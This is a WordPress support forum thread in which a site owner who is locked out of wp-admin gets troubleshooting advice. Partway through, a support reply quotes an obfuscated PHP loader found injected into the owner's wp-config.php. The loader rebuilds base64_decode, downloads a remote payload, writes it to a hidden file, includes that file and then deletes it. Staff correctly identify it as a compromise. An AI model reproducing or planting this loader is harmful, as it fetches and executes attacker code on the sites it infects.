Hi! My website, trudigitalmarketing.com has been functioning fine up until this week. I was able to access the site last week and made updates, however, I went to login to the backend to upload content and I realized that I am not able to access the wp-admin login page (I get a blank screen.) I think it may be a plugin that needs to be updated or deactivated , however, I cannot access it. Can you please help. Tks!
Hi @borinqen2,
You can login through FTP then edit the wp-config.php file and find the line: define( 'WP_DEBUG', false );. Set it to true then save the file. Log back in the admin area and you should be able to see some more error information which will suggest the cause of the issue. If the error is pointing to a third party plugin, please go back to the FTP area them go to wp-content/plugins/ then rename the plugin directory to something else. The plugin should be automatically disabled and you should be able to see the admin area.
If you are getting an error message that suggests: Fatal error: Allowed memory size of xxxxx bytes exhausted, it means that you need to have the PHP memory limit of your site increased.
To do this, please edit your wp-config.php file and insert these lines:
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'WP_MAX_MEMORY_LIMIT', '512M' );
You can add it before the line
/*That's all, stop editing! Happy Blogging. */
In case the issue persists, please try to get in touch with your hosting provider and confirm to them that your PHP memory limit is increased.
If you are still having an issue, please provide us with the admin details of your site in a Secure Note so that we can check this further.
Ok, I will try this. I have already contacted my hosting and they do not want to help. They are saying it has nothing to do with the hosting .
Hi There @borinqen2
In that case, try deactivating all of your plugin by following this guide here (https://www.wpbeginner.com/plugins/how-to-deactivate-all-plugins-when-not-able-to-access-wp-admin/). If it is a plugin conflict, you should be able to access your WordPress dashboard. Then you can rename the plugin folder back and activate your plugins one by one to see which plugin causing this issue.
Also make sure to enable your WP_DEBUG mode during your testing by following this (https://codex.wordpress.org/WP_DEBUG), so that you will see any error messages related to your issue.
That should help you to recover your site. In case if you cannot isolate the issue, provide us with your FTP credentials to check your issue further.
Thanks!
Can you assist. I am attempting this , however, it’s not working. Thank you so much! Right now my entire site is down.
Above are my FTP credentials
In looking at the errors in debug mode… you can see that the error is with the X theme framework
Hi @borinqen2,
That’s just a notice and not an error, and that screenshot is taken from your homepage and not in the admin.
The real reason why your admin isn’t accessible is due to the code you have added to your site’s wp-config.php, pleas remove them.
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "OMITTED";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_ya($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?>
Thanks!
I haven’t added any code. I am not sure why all of that is there. Can you remove? Its not letting me login.
The screenshot was taken from homepage and not admin because I cannot access admin, it does not allow me to. The error was given to me by my hosting provider. All they could tell me was that the error was not on the server side but rather with the theme and they provided me with the error code that they were getting.
Hi @borinqen2,
Based on the code that @Rad pointed out, it seems that your website files were compromised since those codes usually indicate when your site is hacked which is usually caused by unsafe file permissions or weak security of your hosting.
Also, the screenshot that you indicated is not really an error but a notice which does not affect the site performance and will not get displayed if your site debug option is disabled.
I tried checking further and you can still login to your site through here:
https://trudigitalmarketing.com/wp-login.php
However, when I tried to use the admin details you have added in your first post, it give me the error: ERROR: Incorrect username or password..
Kindly try to login then install the Wordfence plugin and scan all your website files using the plugin. If there are any suspicious files or codes added to the website files, the plugin will report it after the scan and it will provide some information on how to clean it up.
Let us know how it goes.
Yes, those files seem like they were malicious because I did not add them. I do have Wordfence installed on the site. The credentials that I just provided were for FTP, the ones for my admin are the following:
Those are my credentials and now it’s not accepting them. Could it be because the site was compromised?
Hi There @borinqen2
If you haven’t hired a developer or a service to build your site, most probably your site is compromised.
You need to escalate this issue through your hosting provider, as they have full access to your website and your log files.
Thanks!
This topic was automatically closed 10 days after the last reply. New replies are no longer allowed.